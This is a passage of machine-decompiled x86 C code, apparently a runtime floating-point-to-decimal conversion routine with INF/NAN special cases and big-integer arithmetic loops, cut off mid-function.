				signed int _t1158;
				signed int _t1159;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				unsigned int _t1170;
				void* _t1174;
				void* _t1175;
				unsigned int _t1176;
				signed int _t1181;
				signed int _t1182;
				signed int _t1184;
				signed int _t1185;
				intOrPtr* _t1187;
				signed int _t1188;
				signed int _t1190;
				signed int _t1191;
				signed int _t1194;
				signed int _t1196;
				signed int _t1197;
				void* _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				void* _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int* _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				intOrPtr* _t1218;
				intOrPtr* _t1219;
				signed int _t1221;
				signed int _t1223;
				signed int _t1226;
				signed int _t1232;
				signed int _t1236;
				signed int _t1237;
				signed int _t1242;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1260;
				signed int _t1261;
				signed int _t1263;
				signed int _t1264;
				signed int _t1266;
				signed int _t1268;
				signed int _t1270;
				signed int _t1273;
				signed int _t1275;
				signed int* _t1276;
				signed int* _t1279;
				signed int _t1288;

				_t1142 = __edx;
				_t1273 = _t1275;
				_t1276 = _t1275 - 0x964;
				_t743 =  *0xa1d668; // 0xda86b1c8
				_v8 = _t743 ^ _t1273;
				_t1055 = _a20;
				_push(__esi);
				_push(__edi);
				_t1187 = _a16;
				_v1924 = _t1187;
				_v1920 = _t1055;
				E00A0C078( &_v1944, __eflags);
				_t1236 = _a8;
				_t748 = 0x2d;
				if((_t1236 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1187 = _t748;
				 *((intOrPtr*)(_t1187 + 8)) = _t1055;
				_t1188 = _a4;
				if((_t1236 & 0x7ff00000) != 0) {
					L5:
					_t753 = E00A086BF( &_a4);
					_pop(_t1070);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1070 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t777 = _t754 - 1;
						__eflags = _t777;
						if(_t777 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t778 = _t777 - 1;
							__eflags = _t778;
							if(_t778 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t778 == 1;
								if(_t778 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1188;
									_a8 = _t1236 & 0x7fffffff;
									_t1288 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1190 = _v1896;
									_v1916 = _a12 + 1;
									_t1077 = _t1190 >> 0x14;
									_t784 = _t1077 & 0x000007ff;
									__eflags = _t784;
									if(_t784 != 0) {
										_t1143 = 0;
										_t784 = 0;
										__eflags = 0;
									} else {
										_t1143 = 1;
									}
									_t1191 = _t1190 & 0x000fffff;
									_t1058 = _v1900 + _t784;
									asm("adc edi, esi");
									__eflags = _t1143;
									_t1078 = _t1077 & 0x000007ff;
									_t1242 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
									_v1872 = _t1242;
									E00A0E0C0(_t1078, _t1288);
									_push(_t1078);
									_push(_t1078);
									 *_t1276 = _t1288;
									_t790 = E00A10F10(E00A0E1D0(_t1191, _t1242), _t1288);
									_v1904 = _t790;
									__eflags = _t790 - 0x7fffffff;
									if(_t790 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t790 - 0x80000000;
										if(_t790 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1058;
									__eflags = _t1191;
									_v464 = _t1191;
									_t1061 = (0 | _t1191 != 0x00000000) + 1;
									_v472 = _t1061;
									__eflags = _t1242;
									if(_t1242 < 0) {
										__eflags = _t1242 - 0xfffffc02;
										if(_t1242 == 0xfffffc02) {
											L101:
											_t792 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1081 = 0;
												__eflags = 0;
											} else {
												_t1081 = _t792 + 1;
											}
											_t793 = 0x20;
											_t794 = _t793 - _t1081;
											__eflags = _t794 - 1;
											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
											__eflags = _t1061 - 0x73;
											_v1865 = _t795;
											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
											__eflags = _t1061 - 0x73;
											if(_t1061 != 0x73) {
												L107:
												_t796 = 0;
												__eflags = 0;
											} else {
												__eflags = _t795;
												if(_t795 == 0) {
													goto L107;
												} else {
													_t796 = 1;
												}
											}
											__eflags = _t1082;
											if(_t1082 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E00A0AA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t796;
												if(_t796 != 0) {
													goto L126;
												} else {
													_t1109 = 0x72;
													__eflags = _t1061 - _t1109;
													if(_t1061 < _t1109) {
														_t1109 = _t1061;
													}
													__eflags = _t1109 - 0xffffffff;
													if(_t1109 != 0xffffffff) {
														_t1260 = _t1109;
														_t1218 =  &_v468 + _t1109 * 4;
														_v1880 = _t1218;
														while(1) {
															__eflags = _t1260 - _t1061;
															if(_t1260 >= _t1061) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1218;
															}
															_t210 = _t1260 - 1; // 0x70
															__eflags = _t210 - _t1061;
															if(_t210 >= _t1061) {
																_t1170 = 0;
																__eflags = 0;
															} else {
																_t1170 =  *(_t1218 - 4);
															}
															_t1218 = _t1218 - 4;
															_t972 = _v1880;
															_t1260 = _t1260 - 1;
															 *_t972 = _t1170 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t972 - 4;
															__eflags = _t1260 - 0xffffffff;
															if(_t1260 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														_t1242 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1109;
													} else {
														_t218 = _t1109 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1194 = 1 - _t1242;
											E009FE920(_t1194,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1273 + 0xbad63d) = 1 << (_t1194 & 0x0000001f);
											_t805 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1110 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1110;
											__eflags = _t1061 - _t1110;
											if(_t1061 == _t1110) {
												_t1174 = 0;
												__eflags = 0;
												while(1) {
													_t974 =  *((intOrPtr*)(_t1273 + _t1174 - 0x570));
													__eflags = _t974 -  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0));
													if(_t974 !=  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0))) {
														goto L101;
													}
													_t1174 = _t1174 + 4;
													__eflags = _t1174 - 8;
													if(_t1174 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1175 = 0;
															__eflags = 0;
														} else {
															_t1175 = _t974 + 1;
														}
														_t975 = 0x20;
														_t1261 = _t1110;
														__eflags = _t975 - _t1175 - _t1110;
														_t977 =  &_v460;
														_v1880 = _t977;
														_t1219 = _t977;
														_t171 =  &_v1865;
														 *_t171 = _t975 - _t1175 - _t1110 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1261 - _t1061;
															if(_t1261 >= _t1061) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1219;
															}
															_t175 = _t1261 - 1; // 0x0
															__eflags = _t175 - _t1061;
															if(_t175 >= _t1061) {
																_t1176 = 0;
																__eflags = 0;
															} else {
																_t1176 =  *(_t1219 - 4);
															}
															_t1219 = _t1219 - 4;
															_t981 = _v1880;
															_t1261 = _t1261 - 1;
															 *_t981 = _t1176 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t981 - 4;
															__eflags = _t1261 - 0xffffffff;
															if(_t1261 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														__eflags = _v1865;
														_t1111 = _t1110 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
														_t1221 = _t1111 >> 5;
														_v1884 = _t1111;
														_t1263 = _t1221 << 2;
														E009FE920(_t1221,  &_v1396, 0, _t1263);
														 *(_t1273 + _t1263 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t805 = _t1221 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t805;
										_t1064 = 0x1cc;
										_v936 = _t805;
										__eflags = _t805 << 2;
										E00A0AA64( &_v932, 0x1cc,  &_v1396, _t805 << 2);
										_t1279 =  &(_t1276[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1264 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1264;
										__eflags = _t1061 - _t1264;
										if(_t1061 != _t1264) {
											L53:
											_t992 = _v1872 + 1;
											_t993 = _t992 & 0x0000001f;
											_t1114 = 0x20;
											_v1876 = _t993;
											_t1223 = _t992 >> 5;
											_v1872 = _t1223;
											_v1908 = _t1114 - _t993;
											_t996 = E009FDDA0(1, _t1114 - _t993, 0);
											_t1116 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t997 = _t996 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t997;
											_v1912 =  !_t997;
											if( *_t108 == 0) {
												_t1117 = 0;
												__eflags = 0;
											} else {
												_t1117 = _t1116 + 1;
											}
											_t999 = 0x20;
											_t1000 = _t999 - _t1117;
											_t1181 = _t1061 + _t1223;
											__eflags = _v1876 - _t1000;
											_v1892 = _t1181;
											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
											__eflags = _t1181 - 0x73;
											_v1865 = _t1001;
											_t1118 = _t1117 & 0xffffff00 | _t1181 - 0x00000073 > 0x00000000;
											__eflags = _t1181 - 0x73;
											if(_t1181 != 0x73) {
												L59:
												_t1002 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1001;
												if(_t1001 == 0) {
													goto L59;
												} else {
													_t1002 = 1;
												}
											}
											__eflags = _t1118;
											if(_t1118 != 0) {
												L81:
												__eflags = 0;
												_t1064 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E00A0AA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t1002;
												if(_t1002 != 0) {
													goto L81;
												} else {
													_t1119 = 0x72;
													__eflags = _t1181 - _t1119;
													if(_t1181 >= _t1119) {
														_t1181 = _t1119;
														_v1892 = _t1119;
													}
													_t1012 = _t1181;
													_v1880 = _t1012;
													__eflags = _t1181 - 0xffffffff;
													if(_t1181 != 0xffffffff) {
														_t1182 = _v1872;
														_t1266 = _t1181 - _t1182;
														__eflags = _t1266;
														_t1123 =  &_v468 + _t1266 * 4;
														_v1888 = _t1123;
														while(1) {
															__eflags = _t1012 - _t1182;
															if(_t1012 < _t1182) {
																break;
															}
															__eflags = _t1266 - _t1061;
															if(_t1266 >= _t1061) {
																_t1226 = 0;
																__eflags = 0;
															} else {
																_t1226 =  *_t1123;
															}
															__eflags = _t1266 - 1 - _t1061;
															if(_t1266 - 1 >= _t1061) {
																_t1017 = 0;
																__eflags = 0;
															} else {
																_t1017 =  *(_t1123 - 4);
															}
															_t1020 = _v1880;
															_t1123 = _v1888 - 4;
															_v1888 = _t1123;
															 *(_t1273 + _t1020 * 4 - 0x1d0) = (_t1226 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
															_t1012 = _t1020 - 1;
															_t1266 = _t1266 - 1;
															_v1880 = _t1012;
															__eflags = _t1012 - 0xffffffff;
															if(_t1012 != 0xffffffff) {
																_t1061 = _v472;
																continue;
															}
															break;
														}
														_t1181 = _v1892;
														_t1223 = _v1872;
														_t1264 = 2;
													}
													__eflags = _t1223;
													if(_t1223 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1223 << 2);
														_t1276 =  &(_t1276[3]);
													}
													__eflags = _v1865;
													_t1064 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1181;
													} else {
														_v472 = _t1181 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1264;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1127 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1273 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0));
												if( *((intOrPtr*)(_t1273 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0))) {
													goto L53;
												}
												_t1127 = _t1127 + 4;
												__eflags = _t1127 - 8;
												if(_t1127 != 8) {
													continue;
												} else {
													_t1023 = _v1872 + 2;
													_t1024 = _t1023 & 0x0000001f;
													_t1128 = 0x20;
													_t1129 = _t1128 - _t1024;
													_v1888 = _t1024;
													_t1268 = _t1023 >> 5;
													_v1876 = _t1268;
													_v1908 = _t1129;
													_t1027 = E009FDDA0(1, _t1129, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1028 = _t1027 - 1;
													__eflags = _t1028;
													asm("bsr ecx, edi");
													_v1884 = _t1028;
													_v1912 =  !_t1028;
													if(_t1028 == 0) {
														_t1130 = 0;
														__eflags = 0;
													} else {
														_t1130 = _t1129 + 1;
													}
													_t1030 = 0x20;
													_t1031 = _t1030 - _t1130;
													_t1184 = _t1268 + 2;
													__eflags = _v1888 - _t1031;
													_v1880 = _t1184;
													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
													__eflags = _t1184 - 0x73;
													_v1865 = _t1032;
													_t1131 = _t1130 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
													__eflags = _t1184 - 0x73;
													if(_t1184 != 0x73) {
														L28:
														_t1033 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1032;
														if(_t1032 == 0) {
															goto L28;
														} else {
															_t1033 = 1;
														}
													}
													__eflags = _t1131;
													if(_t1131 != 0) {
														L50:
														__eflags = 0;
														_t1064 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E00A0AA64( &_v468, 0x1cc,  &_v1396, 0);
														_t1276 =  &(_t1276[4]);
													} else {
														__eflags = _t1033;
														if(_t1033 != 0) {
															goto L50;
														} else {
															_t1134 = 0x72;
															__eflags = _t1184 - _t1134;
															if(_t1184 >= _t1134) {
																_t1184 = _t1134;
																_v1880 = _t1134;
															}
															_t1135 = _t1184;
															_v1892 = _t1135;
															__eflags = _t1184 - 0xffffffff;
															if(_t1184 != 0xffffffff) {
																_t1185 = _v1876;
																_t1270 = _t1184 - _t1185;
																__eflags = _t1270;
																_t1043 =  &_v468 + _t1270 * 4;
																_v1872 = _t1043;
																while(1) {
																	__eflags = _t1135 - _t1185;
																	if(_t1135 < _t1185) {
																		break;
																	}
																	__eflags = _t1270 - _t1061;
																	if(_t1270 >= _t1061) {
																		_t1232 = 0;
																		__eflags = 0;
																	} else {
																		_t1232 =  *_t1043;
																	}
																	__eflags = _t1270 - 1 - _t1061;
																	if(_t1270 - 1 >= _t1061) {
																		_t1045 = 0;
																		__eflags = 0;
																	} else {
																		_t1045 =  *(_v1872 - 4);
																	}
																	_t1140 = _v1892;
																	 *(_t1273 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1232 & _v1884) << _v1888;
																	_t1135 = _t1140 - 1;
																	_t1270 = _t1270 - 1;
																	_t1043 = _v1872 - 4;
																	_v1892 = _t1135;
																	_v1872 = _t1043;
																	__eflags = _t1135 - 0xffffffff;
																	if(_t1135 != 0xffffffff) {
																		_t1061 = _v472;
																		continue;
																	}
																	break;
																}
																_t1184 = _v1880;
																_t1268 = _v1876;
															}
															__eflags = _t1268;
															if(_t1268 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1268 << 2);
																_t1276 =  &(_t1276[3]);
															}
															__eflags = _v1865;
															_t1064 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1184;
															} else {
																_v472 = _t1184 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1038 = 4;
													__eflags = 1;
													_v1396 = _t1038;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1038);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1064);
										_push( &_v932);
										E00A0AA64();
										_t1279 =  &(_t1276[4]);
									}
									_t810 = _v1904;
									_t1084 = 0xa;
									_v1912 = _t1084;
									__eflags = _t810;
									if(_t810 < 0) {
										_t811 =  ~_t810;
										_t812 = _t811 / _t1084;
										_v1880 = _t812;
										_t1085 = _t811 % _t1084;
										_v1884 = _t1085;
										__eflags = _t812;
										if(_t812 == 0) {
											L249:
											__eflags = _t1085;
											if(_t1085 != 0) {
												_t849 =  *(0xa16a9c + _t1085 * 4);
												_v1896 = _t849;
												__eflags = _t849;
												if(_t849 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t849 - 1;
													if(_t849 != 1) {
														_t1096 = _v472;
														__eflags = _t1096;
														if(_t1096 != 0) {
															_t1201 = 0;
															_t1250 = 0;
															__eflags = 0;
															do {
																_t1155 = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) >> 0x20;
																 *(_t1273 + _t1250 * 4 - 0x1d0) = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) + _t1201;
																_t849 = _v1896;
																asm("adc edx, 0x0");
																_t1250 = _t1250 + 1;
																_t1201 = _t1155;
																__eflags = _t1250 - _t1096;
															} while (_t1250 != _t1096);
															__eflags = _t1201;
															if(_t1201 != 0) {
																_t856 = _v472;
																__eflags = _t856 - 0x73;
																if(_t856 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1273 + _t856 * 4 - 0x1d0) = _t1201;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t812 - 0x26;
												if(_t812 > 0x26) {
													_t812 = 0x26;
												}
												_t1097 =  *(0xa16a06 + _t812 * 4) & 0x000000ff;
												_v1872 = _t812;
												_v1400 = ( *(0xa16a06 + _t812 * 4) & 0x000000ff) + ( *(0xa16a07 + _t812 * 4) & 0x000000ff);
												E009FE920(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
												_t867 = E009FEA80( &(( &_v1396)[_t1097]), 0xa16100 + ( *(0xa16a04 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xa16a07 + _t812 * 4) & 0x000000ff) << 2);
												_t1098 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1098;
												__eflags = _t1098 - 1;
												if(_t1098 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1098 - _v472;
														_t1204 =  &_v1396;
														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
														__eflags = _t868;
														if(_t868 != 0) {
															_t1156 =  &_v468;
														} else {
															_t1204 =  &_v468;
															_t1156 =  &_v1396;
														}
														_v1908 = _t1156;
														__eflags = _t868;
														if(_t868 == 0) {
															_t1098 = _v472;
														}
														_v1876 = _t1098;
														__eflags = _t868;
														if(_t868 != 0) {
															_v1892 = _v472;
														}
														_t1157 = 0;
														_t1252 = 0;
														_v1864 = 0;
														__eflags = _t1098;
														if(_t1098 == 0) {
															L243:
															_v472 = _t1157;
															_t870 = _t1157 << 2;
															__eflags = _t870;
															_push(_t870);
															_t871 =  &_v1860;
															goto L244;
														} else {
															_t1205 = _t1204 -  &_v1860;
															__eflags = _t1205;
															_v1928 = _t1205;
															do {
																_t878 =  *(_t1273 + _t1205 + _t1252 * 4 - 0x740);
																_v1896 = _t878;
																__eflags = _t878;
																if(_t878 != 0) {
																	_t879 = 0;
																	_t1206 = 0;
																	_t1099 = _t1252;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1099 - 0x73;
																		if(_t1099 == 0x73) {
																			goto L258;
																		} else {
																			_t1205 = _v1928;
																			_t1098 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1099 - 0x73;
																			if(_t1099 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1099 - _t1157;
																			if(_t1099 == _t1157) {
																				 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																				_t891 = _t879 + 1 + _t1252;
																				__eflags = _t891;
																				_v1864 = _t891;
																				_t879 = _v1888;
																			}
																			_t886 =  *(_v1908 + _t879 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1206;
																			asm("adc edx, 0x0");
																			_t879 = _v1888 + 1;
																			_t1099 = _t1099 + 1;
																			_v1888 = _t879;
																			_t1206 = _t886 * _v1896 >> 0x20;
																			_t1157 = _v1864;
																			__eflags = _t879 - _v1892;
																			if(_t879 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1206;
																				if(_t1206 == 0) {
																					goto L240;
																				}
																				__eflags = _t1099 - 0x73;
																				if(_t1099 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1099 - _t1157;
																					if(_t1099 == _t1157) {
																						_t558 = _t1273 + _t1099 * 4 - 0x740;
																						 *_t558 =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1099 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t884 = _t1206;
																					_t1206 = 0;
																					 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t884;
																					_t1157 = _v1864;
																					asm("adc edi, edi");
																					_t1099 = _t1099 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1252 - _t1157;
																	if(_t1252 == _t1157) {
																		 *(_t1273 + _t1252 * 4 - 0x740) =  *(_t1273 + _t1252 * 4 - 0x740) & _t878;
																		_t526 = _t1252 + 1; // 0x1
																		_t1157 = _t526;
																		_v1864 = _t1157;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1252 = _t1252 + 1;
																__eflags = _t1252 - _t1098;
															} while (_t1252 != _t1098);
															goto L243;
														}
													} else {
														_t1207 = _v468;
														_v472 = _t1098;
														E00A0AA64( &_v468, _t1064,  &_v1396, _t1098 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1207;
														if(_t1207 == 0) {
															goto L203;
														} else {
															__eflags = _t1207 - 1;
															if(_t1207 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1100 = 0;
																	_v1896 = _v472;
																	_t1253 = 0;
																	__eflags = 0;
																	do {
																		_t900 = _t1207;
																		_t1158 = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) >> 0x20;
																		 *(_t1273 + _t1253 * 4 - 0x1d0) = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) + _t1100;
																		asm("adc edx, 0x0");
																		_t1253 = _t1253 + 1;
																		_t1100 = _t1158;
																		__eflags = _t1253 - _v1896;
																	} while (_t1253 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1208 = _v1396;
													__eflags = _t1208;
													if(_t1208 != 0) {
														__eflags = _t1208 - 1;
														if(_t1208 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1101 = 0;
																_v1896 = _v472;
																_t1254 = 0;
																__eflags = 0;
																do {
																	_t905 = _t1208;
																	_t1159 = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) >> 0x20;
																	 *(_t1273 + _t1254 * 4 - 0x1d0) = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) + _t1101;
																	asm("adc edx, 0x0");
																	_t1254 = _t1254 + 1;
																	_t1101 = _t1159;
																	__eflags = _t1254 - _v1896;
																} while (_t1254 != _v1896);
																L208:
																__eflags = _t1100;
																if(_t1100 == 0) {
																	goto L245;
																} else {
																	_t903 = _v472;
																	__eflags = _t903 - 0x73;
																	if(_t903 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E00A0AA64( &_v468, _t1064,  &_v2404, 0);
																		_t1279 =  &(_t1279[4]);
																		_t874 = 0;
																	} else {
																		 *(_t1273 + _t903 * 4 - 0x1d0) = _t1100;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t871 =  &_v2404;
														L244:
														_push(_t871);
														_push(_t1064);
														_push( &_v468);
														E00A0AA64();
														_t1279 =  &(_t1279[4]);
														L245:
														_t874 = 1;
													}
												}
												L246:
												__eflags = _t874;
												if(_t874 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t852 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t812 = _v1880 - _v1872;
												__eflags = _t812;
												_v1880 = _t812;
											} while (_t812 != 0);
											_t1085 = _v1884;
											goto L249;
										}
									} else {
										_t908 = _t810 / _t1084;
										_v1908 = _t908;
										_t1102 = _t810 % _t1084;
										_v1896 = _t1102;
										__eflags = _t908;
										if(_t908 == 0) {
											L184:
											__eflags = _t1102;
											if(_t1102 != 0) {
												_t1209 =  *(0xa16a9c + _t1102 * 4);
												__eflags = _t1209;
												if(_t1209 != 0) {
													__eflags = _t1209 - 1;
													if(_t1209 != 1) {
														_t909 = _v936;
														_v1896 = _t909;
														__eflags = _t909;
														if(_t909 != 0) {
															_t1255 = 0;
															_t1103 = 0;
															__eflags = 0;
															do {
																_t910 = _t1209;
																_t1163 = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) >> 0x20;
																 *(_t1273 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) + _t1255;
																asm("adc edx, 0x0");
																_t1103 = _t1103 + 1;
																_t1255 = _t1163;
																__eflags = _t1103 - _v1896;
															} while (_t1103 != _v1896);
															__eflags = _t1255;
															if(_t1255 != 0) {
																_t913 = _v936;
																__eflags = _t913 - 0x73;
																if(_t913 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1273 + _t913 * 4 - 0x3a0) = _t1255;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t908 - 0x26;
												if(_t908 > 0x26) {
													_t908 = 0x26;
												}
												_t1104 =  *(0xa16a06 + _t908 * 4) & 0x000000ff;
												_v1888 = _t908;
												_v1400 = ( *(0xa16a06 + _t908 * 4) & 0x000000ff) + ( *(0xa16a07 + _t908 * 4) & 0x000000ff);
												E009FE920(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
												_t926 = E009FEA80( &(( &_v1396)[_t1104]), 0xa16100 + ( *(0xa16a04 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xa16a07 + _t908 * 4) & 0x000000ff) << 2);
												_t1105 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1105;
												__eflags = _t1105 - 1;
												if(_t1105 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1105 - _v936;
														_t1212 =  &_v1396;
														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
														__eflags = _t927;
														if(_t927 != 0) {
															_t1164 =  &_v932;
														} else {
															_t1212 =  &_v932;
															_t1164 =  &_v1396;
														}
														_v1876 = _t1164;
														__eflags = _t927;
														if(_t927 == 0) {
															_t1105 = _v936;
														}
														_v1880 = _t1105;
														__eflags = _t927;
														if(_t927 != 0) {
															_v1892 = _v936;
														}
														_t1165 = 0;
														_t1257 = 0;
														_v1864 = 0;
														__eflags = _t1105;
														if(_t1105 == 0) {
															L177:
															_v936 = _t1165;
															_t929 = _t1165 << 2;
															__eflags = _t929;
															goto L178;
														} else {
															_t1213 = _t1212 -  &_v1860;
															__eflags = _t1213;
															_v1928 = _t1213;
															do {
																_t937 =  *(_t1273 + _t1213 + _t1257 * 4 - 0x740);
																_v1884 = _t937;
																__eflags = _t937;
																if(_t937 != 0) {
																	_t938 = 0;
																	_t1214 = 0;
																	_t1106 = _t1257;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1106 - 0x73;
																		if(_t1106 == 0x73) {
																			goto L187;
																		} else {
